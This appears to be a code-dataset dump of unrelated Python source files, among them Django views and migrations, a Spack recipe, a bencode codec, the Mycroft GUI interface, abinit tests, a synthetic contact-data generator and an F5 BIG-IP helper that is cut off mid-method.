content
stringlengths 5
1.05M
|
|---|
from django.shortcuts import render
from django.http import HttpResponse
from .ques_retrieve import *
import json
# Create your views here.
retrieve_model = Predict()
# with open('../ans-score.json','r') as f:
# ans_so = json.load(f)
def home(request):
global retrieve_model
global ans_so
if request.method == "POST":
req_dict = request.POST
sentence = req_dict['search']
ans_so, output = retrieve_model.predict(sentence.strip())
print(ans_so)
print(output)
titles = []
all_questions = []
for item in retrieve_model.top_ques.ques:
all_questions.append( {'qtitle':item[0], 'qurl':item[2]} )
for item in output:
ans = []
qid = str(item['qid'])
try:
for ans_score in ans_so[qid]:
if ans_score['sentimental_score'] > 0.0:
sentiment = 'positive'
elif ans_score['sentimental_score'] == 0.0:
sentiment = 'neutral'
else:
sentiment = 'negative'
sentimental_sc = ans_score['sentimental_score']
sc = ans_score['score']
if np.isnan(sentimental_sc):
sentimental_sc = 0.0
sentimental_sc = "{:.5f}".format(sentimental_sc)
sc = "{:.5f}".format(sc)
ans.append({
'aid':str(ans_score['aid']),
'senti_score':str(sentimental_sc),
'upvote':str(ans_score['upvotes']),
'sentiment':sentiment,
'score':str(sc)
})
except:
pass
titles.append( {'qtitle' : item['qtitle'], 'qurl' : item['qurl'], 'aid': ans} )
temp = {
'all_questions': all_questions[:50],
'output': titles,
'show' : True,
'sentence' : sentence
}
print("="*25,"Done Fetching","="*25)
return render(request, 'main.html', temp)
else:
return render(request, 'main.html')
def profile(request):
return render(request, 'userprofile.html')
def signin(request):
return render(request, 'signin.html')
def signup(request):
return render(request, 'signup.html')
def post(request):
return render(request, 'post_question.html')
|
# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RLpsolve(RPackage):
"""Lp_solve is freely available (under LGPL 2) software for solving
linear, integer and mixed integer programs. In this
implementation we supply a "wrapper" function in C and some R
functions that solve general linear/integer problems, assignment
problems, and transportation problems. This version calls
lp_solve"""
homepage = "https://cloud.r-project.org/package=lpSolve"
url = "https://cloud.r-project.org/src/contrib/lpSolve_5.6.13.tar.gz"
list_url = "https://cloud.r-project.org/src/contrib/Archive/lpSolve"
version('5.6.13.2', sha256='75f0c0af5cbdc219ac29c792342ecd625903632ad86e581c408879958aa88539')
version('5.6.13.1', sha256='6ad8dc430f72a4698fc4a615bb5ecb73690b3c4520e84d9094af51a528f720b8')
version('5.6.13', sha256='d5d41c53212dead4fd8e6425a9d3c5767cdc5feb19d768a4704116d791cf498d')
|
from heapq import heappush, heappop
def heap_sort(heap_iterable):
'''
Heap sort implementation
'''
heap = []
for val in heap_iterable:
heappush(heap, val)
return [heappop(heap) for _ in range(len(heap))]
# Test
if __name__ == '__main__':
test_cases = (
[1, 3, 5, 7, 9, 2, 4, 6, 8, 0],
[3, 15, 68, 34, 39, 85, 85, 71, 47, 84],
[3, 10, 68, 34, 15, 85, 85, 71, 47, 84, 39],
[2, 10, 3, 34, 15, 68, 85, 71, 47, 84, 39, 85],
[1, 10, 2, 34, 15, 3, 85, 71, 47, 84, 39, 85, 68],
range(50)
)
for iterable in test_cases:
assert heap_sort(iterable) == sorted(iterable)
|
# Written by Petru Paler
# Some bits removed by uriel, all bugs are his fault.
def decode_int(x, f):
f += 1
newf = x.index('e', f)
try:
n = int(x[f:newf])
except (OverflowError, ValueError):
n = long(x[f:newf])
if x[f] == '-':
if x[f + 1] == '0':
raise ValueError
elif x[f] == '0' and newf != f+1:
raise ValueError
return (n, newf+1)
def decode_string(x, f):
colon = x.index(':', f)
try:
n = int(x[f:colon])
except (OverflowError, ValueError):
n = long(x[f:colon])
if x[f] == '0' and colon != f+1:
raise ValueError
colon += 1
return (x[colon:colon+n], colon+n)
def decode_list(x, f):
r, f = [], f+1
while x[f] != 'e':
v, f = decode_func[x[f]](x, f)
r.append(v)
return (r, f + 1)
def decode_dict(x, f):
r, f = {}, f+1
lastkey = None
while x[f] != 'e':
k, f = decode_string(x, f)
if lastkey >= k:
raise ValueError
lastkey = k
r[k], f = decode_func[x[f]](x, f)
return (r, f + 1)
decode_func = {}
decode_func['l'] = decode_list
decode_func['d'] = decode_dict
decode_func['i'] = decode_int
decode_func['0'] = decode_string
decode_func['1'] = decode_string
decode_func['2'] = decode_string
decode_func['3'] = decode_string
decode_func['4'] = decode_string
decode_func['5'] = decode_string
decode_func['6'] = decode_string
decode_func['7'] = decode_string
decode_func['8'] = decode_string
decode_func['9'] = decode_string
def bdecode(x):
try:
r, l = decode_func[x[0]](x, 0)
except (IndexError, KeyError):
raise ValueError
if l != len(x):
raise ValueError
return r
from types import StringType, IntType, LongType, DictType, ListType, TupleType, BooleanType
class Bencached(object):
__slots__ = ['bencoded']
def __init__(self, s):
self.bencoded = s
def encode_bencached(x,r):
r.append(x.bencoded)
def encode_int(x, r):
r.extend(('i', str(x), 'e'))
def encode_string(x, r):
r.extend((str(len(x)), ':', x))
def encode_list(x, r):
r.append('l')
for i in x:
encode_func[type(i)](i, r)
r.append('e')
def encode_dict(x,r):
r.append('d')
ilist = x.items()
ilist.sort()
for k, v in ilist:
r.extend((str(len(k)), ':', k))
encode_func[type(v)](v, r)
r.append('e')
encode_func = {}
encode_func[type(Bencached(0))] = encode_bencached
encode_func[IntType] = encode_int
encode_func[LongType] = encode_int
encode_func[StringType] = encode_string
encode_func[ListType] = encode_list
encode_func[TupleType] = encode_list
encode_func[DictType] = encode_dict
encode_func[BooleanType] = encode_int
def bencode(x):
r = []
encode_func[type(x)](x, r)
return ''.join(r)
|
from .parts.environment import *
from .parts.agents import *
partial_state_update_block = [
{
# environment.py
'policies': {
'grow_food': grow_food
},
'variables': {
'sites': update_food
}
},
{
# agents.py
'policies': {
'increase_agent_age': digest_and_olden
},
'variables': {
'agents': agent_food_age
}
},
{
# agents.py
'policies': {
'move_agent': move_agents
},
'variables': {
'agents': agent_location
}
},
{
# agents.py
'policies': {
'reproduce_agents': reproduce_agents
},
'variables': {
'agents': agent_create
}
},
{
# agents.py
'policies': {
'feed_prey': feed_prey
},
'variables': {
'agents': agent_food,
'sites': site_food
}
},
{
# agents.py
'policies': {
'hunt_prey': hunt_prey
},
'variables': {
'agents': agent_food
}
},
{
# agents.py
'policies': {
'hunt_prey': hunt_everybody
},
'variables': {
'agents': agent_food
}
},
{
# agents.py
'policies': {
'natural_death': natural_death
},
'variables': {
'agents': agent_remove
}
}
]
|
import unittest
class PickleableSession(unittest.TestCase):
def test_constructor_and_properties(self):
from vishnu.backend.client import PickleableSession
from datetime import datetime
expires = datetime(2018, 1, 1, 0, 0, 0)
last_accessed = (2017, 12, 30, 10, 0, 0)
data = "data"
ps = PickleableSession(
expires=expires,
last_accessed=last_accessed,
data=data
)
self.assertEqual(ps.expires, expires)
self.assertEqual(ps.last_accessed, last_accessed)
self.assertEqual(ps.data, data)
def test_can_pickle(self):
pass
|
#! python
# -*- coding: utf-8 -*-
from itertools import chain
import plugins.ld_ring as base
## reload(base)
class Model(base.Model):
def residual(self, fitting_params, x, y):
"""最小自乗法の剰余函数"""
xc, yc = 0, 0
cam, ratio, phi = fitting_params
z = base.calc_aspect(x + 1j*y, 1/ratio, phi) # z = x+iy --> 逆変換 1/r
## φ超過時の補正
if not -90 < phi < 90:
## print(" warning! phi is over limit ({:g})".format(phi))
if phi < -90: phi += 180
elif phi > 90: phi -= 180
fitting_params[2] = phi
if not self.owner.thread.is_active:
print("... Iteration stopped")
raise StopIteration
## 真円からのズレを評価する
x, y = z.real, z.imag
rc = cam * self.Angles[self.Index]
res = abs((x-xc)**2 + (y-yc)**2 - rc**2)
print("\b"*72 + "point({}): residual {:g}".format(len(res), sum(res)), end='')
return res
class Plugin(base.Plugin):
"""Distortion fitting of ring (override) with fixed origin center
"""
menu = "Plugins/Measure &Cetntral-dist"
Fitting_model = Model
fitting_params = property(
lambda self: self.grid_params[:1] + self.ratio_params)
def Init(self):
base.Plugin.Init(self)
for lp in chain(self.dist_params, self.grid_params[1:]):
for k in lp.knobs:
k.Enable(0)
self.show(0, False)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('organization', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='section',
name='default_card',
field=models.ImageField(help_text=b"Default card for stories in this section that don't specify their own card.", upload_to=b'organization/section/default_card'),
),
migrations.AlterField(
model_name='section',
name='default_card_focus',
field=models.CharField(default=b'cc', help_text=b"Location of the focal point for this section's card image.", max_length=2, choices=[(b'cc', b'center center'), (b'cl', b'center left'), (b'cr', b'center right'), (b'tl', b'top left'), (b'tc', b'top center'), (b'tr', b'top right'), (b'bl', b'bottom left'), (b'bc', b'bottom center'), (b'br', b'bottom right')]),
),
migrations.AlterField(
model_name='section',
name='description',
field=models.TextField(help_text=b'Short description of what this section covers/is about.', blank=True),
),
migrations.AlterField(
model_name='section',
name='facebook',
field=models.CharField(help_text=b'Facebook username for this section. Can be found in the URL.', max_length=32, blank=True),
),
migrations.AlterField(
model_name='section',
name='position',
field=models.PositiveIntegerField(help_text=b'Ordering of this section relative to other sections.'),
),
migrations.AlterField(
model_name='section',
name='profile_image',
field=models.ImageField(help_text=b'Social media profile image for this section.', upload_to=b'organization/section/profile_image', blank=True),
),
migrations.AlterField(
model_name='section',
name='slug',
field=models.SlugField(help_text=b'Used as part of the URL for this section.', unique=True, max_length=32),
),
migrations.AlterField(
model_name='section',
name='twitter',
field=models.CharField(help_text=b'Twitter handle for this section, without an "@" symbol.', max_length=15, blank=True),
),
migrations.AlterField(
model_name='tag',
name='description',
field=models.TextField(help_text=b'Short description of what this tag is about.', blank=True),
),
migrations.AlterField(
model_name='tag',
name='series',
field=models.BooleanField(default=False, help_text=b'Whether or not this tag is forms a series.'),
),
migrations.AlterField(
model_name='tag',
name='slug',
field=models.SlugField(help_text=b'Used as part of the URL for this tag.', unique=True, max_length=32),
),
]
|
# Copyright 2019 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Interface for interacting with the Mycroft gui qml viewer. """
from os.path import join
from mycroft.configuration import Configuration
from mycroft.messagebus.message import Message
from mycroft.util import resolve_resource_file
class SkillGUI:
"""SkillGUI - Interface to the Graphical User Interface
Values set in this class are synced to the GUI, accessible within QML
via the built-in sessionData mechanism. For example, in Python you can
write in a skill:
self.gui['temp'] = 33
self.gui.show_page('Weather.qml')
Then in the Weather.qml you'd access the temp via code such as:
text: sessionData.time
"""
def __init__(self, skill):
self.__session_data = {} # synced to GUI for use by this skill's pages
self.page = None # the active GUI page (e.g. QML template) to show
self.skill = skill
self.on_gui_changed_callback = None
self.config = Configuration.get()
@property
def remote_url(self):
"""Returns configuration value for url of remote-server."""
return self.config.get('remote-server')
def build_message_type(self, event):
"""Builds a message matching the output from the enclosure."""
return '{}.{}'.format(self.skill.skill_id, event)
def setup_default_handlers(self):
"""Sets the handlers for the default messages."""
msg_type = self.build_message_type('set')
self.skill.add_event(msg_type, self.gui_set)
def register_handler(self, event, handler):
"""Register a handler for GUI events.
When using the triggerEvent method from Qt
triggerEvent("event", {"data": "cool"})
Arguments:
event (str): event to catch
handler: function to handle the event
"""
msg_type = self.build_message_type(event)
self.skill.add_event(msg_type, handler)
def set_on_gui_changed(self, callback):
"""Registers a callback function to run when a value is
changed from the GUI.
Arguments:
callback: Function to call when a value is changed
"""
self.on_gui_changed_callback = callback
def gui_set(self, message):
"""Handler catching variable changes from the GUI.
Arguments:
message: Messagebus message
"""
for key in message.data:
self[key] = message.data[key]
if self.on_gui_changed_callback:
self.on_gui_changed_callback()
def __setitem__(self, key, value):
"""Implements set part of dict-like behaviour with named keys."""
self.__session_data[key] = value
if self.page:
# emit notification (but not needed if page has not been shown yet)
data = self.__session_data.copy()
data.update({'__from': self.skill.skill_id})
self.skill.bus.emit(Message("gui.value.set", data))
def __getitem__(self, key):
"""Implements get part of dict-like behaviour with named keys."""
return self.__session_data[key]
def __contains__(self, key):
"""Implements the "in" operation."""
return self.__session_data.__contains__(key)
def clear(self):
"""Reset the value dictionary, and remove namespace from GUI."""
self.__session_data = {}
self.page = None
self.skill.bus.emit(Message("gui.clear.namespace",
{"__from": self.skill.skill_id}))
def send_event(self, event_name, params=None):
"""Trigger a gui event.
Arguments:
event_name (str): name of event to be triggered
params: json serializable object containing any parameters that
should be sent along with the request.
"""
params = params or {}
self.skill.bus.emit(Message("gui.event.send",
{"__from": self.skill.skill_id,
"event_name": event_name,
"params": params}))
def show_page(self, name, override_idle=None,
override_animations=False):
"""Begin showing the page in the GUI
Arguments:
name (str): Name of page (e.g "mypage.qml") to display
override_idle (boolean, int):
True: Takes over the resting page indefinitely
(int): Delays resting page for the specified number of
seconds.
override_animations (boolean):
True: Disables showing all platform skill animations.
False: 'Default' always show animations.
"""
self.show_pages([name], 0, override_idle, override_animations)
def show_pages(self, page_names, index=0, override_idle=None,
override_animations=False):
"""Begin showing the list of pages in the GUI.
Arguments:
page_names (list): List of page names (str) to display, such as
["Weather.qml", "Forecast.qml", "Details.qml"]
index (int): Page number (0-based) to show initially. For the
above list a value of 1 would start on "Forecast.qml"
override_idle (boolean, int):
True: Takes over the resting page indefinitely
(int): Delays resting page for the specified number of
seconds.
override_animations (boolean):
True: Disables showing all platform skill animations.
False: 'Default' always show animations.
"""
if not isinstance(page_names, list):
raise ValueError('page_names must be a list')
if index > len(page_names):
raise ValueError('Default index is larger than page list length')
self.page = page_names[index]
# First sync any data...
data = self.__session_data.copy()
data.update({'__from': self.skill.skill_id})
self.skill.bus.emit(Message("gui.value.set", data))
# Convert pages to full reference
page_urls = []
for name in page_names:
if name.startswith("SYSTEM"):
page = resolve_resource_file(join('ui', name))
else:
page = self.skill.find_resource(name, 'ui')
if page:
if self.config.get('remote'):
page_urls.append(self.remote_url + "/" + page)
else:
page_urls.append("file://" + page)
else:
raise FileNotFoundError("Unable to find page: {}".format(name))
self.skill.bus.emit(Message("gui.page.show",
{"page": page_urls,
"index": index,
"__from": self.skill.skill_id,
"__idle": override_idle,
"__animations": override_animations}))
def remove_page(self, page):
"""Remove a single page from the GUI.
Arguments:
page (str): Page to remove from the GUI
"""
return self.remove_pages([page])
def remove_pages(self, page_names):
"""Remove a list of pages in the GUI.
Arguments:
page_names (list): List of page names (str) to display, such as
["Weather.qml", "Forecast.qml", "Other.qml"]
"""
if not isinstance(page_names, list):
raise ValueError('page_names must be a list')
# Convert pages to full reference
page_urls = []
for name in page_names:
page = self.skill.find_resource(name, 'ui')
if page:
page_urls.append("file://" + page)
else:
raise FileNotFoundError("Unable to find page: {}".format(name))
self.skill.bus.emit(Message("gui.page.delete",
{"page": page_urls,
"__from": self.skill.skill_id}))
def show_text(self, text, title=None, override_idle=None,
override_animations=False):
"""Display a GUI page for viewing simple text.
Arguments:
text (str): Main text content. It will auto-paginate
title (str): A title to display above the text content.
override_idle (boolean, int):
True: Takes over the resting page indefinitely
(int): Delays resting page for the specified number of
seconds.
override_animations (boolean):
True: Disables showing all platform skill animations.
False: 'Default' always show animations.
"""
self.clear()
self["text"] = text
self["title"] = title
self.show_page("SYSTEM_TextFrame.qml", override_idle,
override_animations)
def show_image(self, url, caption=None,
title=None, fill=None,
override_idle=None, override_animations=False):
"""Display a GUI page for viewing an image.
Arguments:
url (str): Pointer to the image
caption (str): A caption to show under the image
title (str): A title to display above the image content
fill (str): Fill type supports 'PreserveAspectFit',
'PreserveAspectCrop', 'Stretch'
override_idle (boolean, int):
True: Takes over the resting page indefinitely
(int): Delays resting page for the specified number of
seconds.
override_animations (boolean):
True: Disables showing all platform skill animations.
False: 'Default' always show animations.
"""
self.clear()
self["image"] = url
self["title"] = title
self["caption"] = caption
self["fill"] = fill
self.show_page("SYSTEM_ImageFrame.qml", override_idle,
override_animations)
def show_animated_image(self, url, caption=None,
title=None, fill=None,
override_idle=None, override_animations=False):
"""Display a GUI page for viewing an image.
Arguments:
url (str): Pointer to the .gif image
caption (str): A caption to show under the image
title (str): A title to display above the image content
fill (str): Fill type supports 'PreserveAspectFit',
'PreserveAspectCrop', 'Stretch'
override_idle (boolean, int):
True: Takes over the resting page indefinitely
(int): Delays resting page for the specified number of
seconds.
override_animations (boolean):
True: Disables showing all platform skill animations.
False: 'Default' always show animations.
"""
self.clear()
self["image"] = url
self["title"] = title
self["caption"] = caption
self["fill"] = fill
self.show_page("SYSTEM_AnimatedImageFrame.qml", override_idle,
override_animations)
def show_html(self, html, resource_url=None, override_idle=None,
override_animations=False):
"""Display an HTML page in the GUI.
Arguments:
html (str): HTML text to display
resource_url (str): Pointer to HTML resources
override_idle (boolean, int):
True: Takes over the resting page indefinitely
(int): Delays resting page for the specified number of
seconds.
override_animations (boolean):
True: Disables showing all platform skill animations.
False: 'Default' always show animations.
"""
self.clear()
self["html"] = html
self["resourceLocation"] = resource_url
self.show_page("SYSTEM_HtmlFrame.qml", override_idle,
override_animations)
def show_url(self, url, override_idle=None,
override_animations=False):
"""Display an HTML page in the GUI.
Arguments:
url (str): URL to render
override_idle (boolean, int):
True: Takes over the resting page indefinitely
(int): Delays resting page for the specified number of
seconds.
override_animations (boolean):
True: Disables showing all platform skill animations.
False: 'Default' always show animations.
"""
self.clear()
self["url"] = url
self.show_page("SYSTEM_UrlFrame.qml", override_idle,
override_animations)
def shutdown(self):
"""Shutdown gui interface.
Clear pages loaded through this interface and remove the skill
reference to make ref counting warning more precise.
"""
self.clear()
self.skill = None
|
"""Search Using a Boolean Variable"""
found = False
print('Before', found)
for value in [9, 41, 12, 3, 74, 15]:
if value == 3:
found = True
break
print(found, value)
print('After: ', found)
|
def test_abinit_parser():
"""
Test (pychemia.code.abinit) [parser] :
"""
from pychemia.code.abinit import parser
from numpy import array, all, ones
from math import sqrt
import tempfile
wf = tempfile.NamedTemporaryFile(mode='w')
wf.write(' # Comentario\n')
wf.write(' ! Comentario\n')
wf.write('\n')
wf.write('inputvar1 1 # integer\n')
wf.write('inputvar2 1.2 # float\n')
wf.write('inputvar3 3*4 # list of integer\n')
wf.write('inputvar4 3*4.5 # list of float\n')
wf.write('inputvar5 3*4.5e6 # list of float\n')
wf.write('inputvar6 3*4.5d7 # list of float\n')
wf.write('inputvar7 3*4.5E6 # list of float\n')
wf.write('inputvar8 3*4.5D7 # list of float\n')
wf.write('inputvar9 *1\n')
wf.write('inputvar10 sqrt(2)\n')
wf.write('inputvar11 6*sqrt(3)\n')
wf.flush()
inp = parser(wf.name)
wf.close()
assert len(inp.keys()) == 11
assert inp['inputvar1'] == array([1])
assert inp['inputvar2'] == array([1.2])
assert all(inp['inputvar3'] == 4 * ones(3))
assert all(inp['inputvar4'] == 4.5 * ones(3))
assert all(inp['inputvar5'] == 4.5e6 * ones(3))
assert all(inp['inputvar6'] == 4.5e7 * ones(3))
assert all(inp['inputvar7'] == 4.5e6 * ones(3))
assert all(inp['inputvar8'] == 4.5e7 * ones(3))
assert inp['inputvar9'] == '*1'
assert inp['inputvar10'] == sqrt(2)
assert all(inp['inputvar11'] == sqrt(3) * ones(6))
def test_abinit_utils():
"""
Test (pychemia.code.abinit) [utils] :
"""
from pychemia.utils.netcdf import netcdf2dict
from pychemia.code.abinit import xyz2input, psp_name
filename = "tests/data/abinit_05/abinit-o_OUT.nc"
print(len(netcdf2dict(filename)))
assert len(netcdf2dict(filename)) == 45
assert psp_name(1, 'LDA', 'FHI') == '01-H.LDA.fhi'
filename = "tests/data/abinit_01/abinit_DS11.xyz"
assert xyz2input(filename).variables['natom'] == 2
def test_abinit_abifiles():
"""
Test (pychemia.code.abinit) [abifiles] :
"""
from pychemia.code.abinit import AbiFiles
filename = "tests/data/abinit_01/abinit.files"
abf = AbiFiles(filename)
assert abf.filename == "abinit.files"
assert abf.get_input_filename() == 'tests/data/abinit_01/abinit.in'
def test_abinit_input():
"""
Test (pychemia.code.abinit) [input] :
"""
from pychemia.code.abinit import AbiFiles, AbinitInput
filename = "tests/data/abinit_01/abinit.files"
abf = AbiFiles(filename)
inp = AbinitInput(abf.get_input_filename())
print(inp)
print(len(inp))
assert len(inp) == 31
assert inp.get_value('ecut') == 10
assert len(inp.get_dtsets_keys()) == 12
assert inp.get_value('ntime', 41) == 10
assert inp.get_value('acell', 41)[0] == 14
def test_abinit():
"""
Test (pychemia.code.abinit) [general] :
"""
import os
import pychemia.code.abinit
af = pychemia.code.abinit.AbiFiles(basedir='tests/data/abinit_03')
iv = pychemia.code.abinit.AbinitInput('tests/data/abinit_03/rnpg.in')
af.set_input(iv)
af.set_psps('LDA', 'FHI')
af.create()
iv.write(af.get_input_filename())
assert len(open(af.get_input_filename()).readlines()) == 71
rf = open('tests/data/abinit_03/abinit.files')
data = rf.readlines()
print(data)
for i in [ -4, -3, -2, -1]:
assert(data[i].strip()[-4:] == '.fhi')
rf.close()
os.remove('tests/data/abinit_03/abinit.files')
|
<m>C:\Temp\EL> C:\Python23\python</m>
## (snipped: various greeting messages from Python)
>>> from elemlist import cons, car, cdr
>>> a = cons(1, cons(2, cons(3, ())))
>>> car(cdr(a))
2
>>>
|
import builtins
import csv
import random
import string
import re
import itertools
from security import *
################################################################################
with open('PCC Sales Contacts Master List S13.csv', newline='') as file:
file.readline()
file.readline()
reader = csv.DictReader(file)
table = tuple(reader)
def strip_columns(row):
for key, value in row.items():
row[key] = '' if value is None else value.strip()
def extract_contact_parts(row):
contact = row['Contact']
row['contact_fname'] = row['contact_lname'] = row['contact_title'] = ''
if contact:
parts = contact.split()
if parts[0] in {'Mr.', 'Mrs.', 'Dr.', 'Miss'}:
row['contact_title'] = parts.pop(0)
assert parts, 'Parts should not be empty!'
if len(parts) == 1:
row['contact_fname'] = parts[0]
else:
*first_name, last_name = parts
row['contact_fname'] = ' '.join(first_name)
row['contact_lname'] = last_name
TELEPHONE_REGEX = r'\A(17\s*-\s*\d{4}\s*-\s*[1-4]|((\d{3}\s*-\s*){1,2}\d{4})?(\s*[Ee][Xx][Tt]\.?\s*\d{1,7})?)\Z'
PHONE_TRANS = str.maketrans('ABCDEFGHIJKLMNOPQRSTUVWXYZ',
'22233344455566677778889999')
def phone_letter_to_number(text):
return text.upper().replace('EXT.', '\0') \
.translate(PHONE_TRANS).replace('\0', 'Ext.')
def scrub_telephone(row):
number = row['Telephone'].replace('?', '').replace(',', '')
if re.search(TELEPHONE_REGEX, number) is None:
match = re.search(r'^x(?P<ext>\d{4})$', number)
if match is not None:
number = '850-478-8496 Ext. ' + match.groupdict()['ext']
match = re.search(r'^(?P<num>(\d{3}\s*-\s*){1,2}\d{4})\s*x(?P<ext>\d{1,7})$', number)
if match is not None:
number = '{num} Ext. {ext}'.format(**match.groupdict())
match = re.search(r'^\((?P<area>\d{3})\)\s*(?P<tri>\d{3})\s*-\s*(?P<quad>\d{4})$', number)
if match is not None:
number = '{area}-{tri}-{quad}'.format(**match.groupdict())
number = phone_letter_to_number(number)
if re.search(TELEPHONE_REGEX, number) is None:
print('Warning:', repr(row['Telephone']), 'cannot be scrubbed!')
number = ''
row['Telephone'] = number
for row in table:
strip_columns(row)
extract_contact_parts(row)
scrub_telephone(row)
pivot = {column: [] for column in table[0]}
for row in table:
for column, value in row.items():
pivot[column].append(value)
################################################################################
company_name = set()
for value in pivot['Company Name (print your name)']:
company_name.update(value.split())
COMPANY_NAME_POOL = set(filter(None, (''.join(filter(
string.ascii_letters.__contains__, name)) for name in company_name)))
def generate_company_name():
used = set()
while True:
name = ' '.join(random.sample(COMPANY_NAME_POOL, random.randint(2, 5)))
if name not in used:
used.add(name)
yield name
################################################################################
address_number = set()
address_name = set()
for name in pivot['Address']:
for part in name.split():
if part.isdigit():
address_number.add(part)
elif part.isalpha():
address_name.add(part)
address_number = tuple(address_number)
def generate_address():
used = set()
while True:
name = '{} {} {}'.format(random.choice(address_number),
*random.sample(address_name, 2))
if name not in used:
used.add(name)
yield name
################################################################################
cities = set()
states = set()
for city_state in pivot['City, State']:
if ', ' in city_state:
c, s = city_state.split(', ')
cities.add(c.strip())
states.add(s.strip())
CITIES, STATES = tuple(cities), tuple(states)
def generate_city_state():
while True:
yield '{}, {}'.format(random.choice(CITIES), random.choice(STATES))
################################################################################
ZIP = tuple(set(filter(None, pivot['Zip'])))
def generate_zip():
while True:
yield random.choice(ZIP)
################################################################################
TITLE = tuple({n for n in pivot['contact_title'] if n})
FNAME = tuple({n for n in pivot['contact_fname'] if n.isalpha()})
LNAME = tuple({n for n in pivot['contact_lname'] if n.isalpha()})
def generate_contact():
used = set()
while True:
name = '{} {} {}'.format(random.choice(TITLE),
random.choice(FNAME),
random.choice(LNAME))
if name not in used:
used.add(name)
yield name
################################################################################
NUMBER_PARTS = {name: set() for name in ('area', 'tri', 'quad', 'ext')}
for number in filter(None, pivot['Telephone']):
group = re.search(r'\A((?P<area>\d{3})\s*-\s*)?(?P<tri>\d{3})\s*-\s*(?P<quad>\d{4})(\s*[Ee][Xx][Tt]\.?\s*(?P<ext>\d{1,7}))?\Z', number).groupdict()
for key, value in group.items():
NUMBER_PARTS[key].add(value)
for name, parts in NUMBER_PARTS.items():
parts.discard(None)
NUMBER_PARTS[name] = tuple(parts)
def generate_telephone():
used = set()
while True:
area = ext = ''
if random.randrange(2):
area = random.choice(NUMBER_PARTS['area']) + '-'
tri = random.choice(NUMBER_PARTS['tri']) + '-'
quad = random.choice(NUMBER_PARTS['quad'])
if random.randrange(2):
ext = ' Ext. ' + random.choice(NUMBER_PARTS['ext'])
number = area + tri + quad + ext
if number not in used:
used.add(number)
yield number
################################################################################
YEARS = set()
for cell in filter(None, itertools.chain(pivot['Arrow'], pivot['Calendar'])):
YEARS.update(''.join(c for c in cell if c in '1234567890,').split(','))
def generate_years():
while True:
if random.randrange(2):
yield ''
else:
yield ','.join(sorted(random.sample(YEARS, random.randint(
1, len(YEARS))), key=int))
################################################################################
COMMENTS = tuple(set(filter(None, pivot['Comments (Done?)'])))
def generate_comments():
while True:
if random.randrange(2):
yield ''
else:
yield random.choice(COMMENTS)
################################################################################
def main():
row_gen = generate_rows()
with builtins.open('expo_data.csv', 'w', newline='') as file:
writer = csv.DictWriter(file, reader.fieldnames)
writer.writeheader()
for _ in range(1000):
writer.writerow(next(row_gen))
def generate_rows():
name_gen = generate_company_name()
addr_gen = generate_address()
city_gen = generate_city_state()
code_gen = generate_zip()
repr_gen = generate_contact()
tele_gen = generate_telephone()
year_gen = generate_years()
note_gen = generate_comments()
while True:
yield dict(zip(reader.fieldnames, (next(name_gen),
next(addr_gen),
next(city_gen),
next(code_gen),
next(repr_gen),
next(tele_gen),
next(year_gen),
next(year_gen),
next(note_gen))))
################################################################################
if __name__ == '__main__':
main()
|
# Copyright 2014-2016 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from oslo_log import log as logging
from f5_openstack_agent.lbaasv2.drivers.bigip.network_helper import \
NetworkHelper
from f5_openstack_agent.lbaasv2.drivers.bigip.resource_helper \
import BigIPResourceHelper
from f5_openstack_agent.lbaasv2.drivers.bigip.resource_helper \
import ResourceType
LOG = logging.getLogger(__name__)
class SystemHelper(object):
def __init__(self):
self.exempt_folders = ['/', 'Common']
def create_folder(self, bigip, folder):
f = bigip.tm.sys.folders.folder
f.create(**folder)
def delete_folder(self, bigip, folder_name):
f = bigip.tm.sys.folders.folder
if f.exists(name=folder_name):
obj = f.load(name=folder_name)
obj.delete()
def folder_exists(self, bigip, folder):
if folder == 'Common':
return True
return bigip.tm.sys.folders.folder.exists(name=folder)
def get_folders(self, bigip):
f_collection = []
folders = bigip.tm.sys.folders.get_collection()
for folder in folders:
f_collection.append(folder.name)
return f_collection
def get_major_version(self, bigip):
version = self.get_version(bigip)
if version:
return version.split('.')[0]
return version
def get_minor_version(self, bigip):
version = self.get_version(bigip)
if version:
return version.split('.')[1]
return version
def get_version(self, bigip):
devices = bigip.tm.cm.devices.get_collection()
for device in devices:
if device.selfDevice == 'true':
return device.version
return ""
def get_serial_number(self, bigip):
devices = bigip.tm.cm.devices.get_collection()
for device in devices:
if device.selfDevice == 'true':
return device.chassisId
return None
def get_platform(self, bigip):
return ''
def get_tunnel_sync(self, bigip):
db = bigip.tm.sys.dbs.db.load(name='iptunnel.configsync')
if hasattr(db, 'value'):
return db.value
return ''
def set_tunnel_sync(self, bigip, enabled=False):
if enabled:
val = 'enable'
else:
val = 'disable'
db = bigip.tm.sys.dbs.db.load(name='iptunnel.configsync')
db.modify(value=val)
def get_provision_extramb(self, bigip):
db = bigip.tm.sys.dbs.db.load(name='provision.extramb')
if hasattr(db, 'value'):
return db.value
return 0
def get_mac_addresses(self, bigip):
macs = []
interfaces = bigip.tm.net.interfaces.get_collection()
for interface in interfaces:
macs.append(interface.macAddress)
return macs
def get_interface_macaddresses_dict(self, bigip):
# Get dictionary of mac addresses keyed by their interface name
mac_dict = {}
interfaces = bigip.tm.net.interfaces.get_collection()
for interface in interfaces:
mac_dict[interface.name] = interface.macAddress
return mac_dict
def purge_orphaned_folders(self, bigip):
LOG.error("method not implemented")
def purge_orphaned_folders_contents(self, bigip, folders):
LOG.error("method not implemented")
def purge_folder_contents(self, bigip, folder):
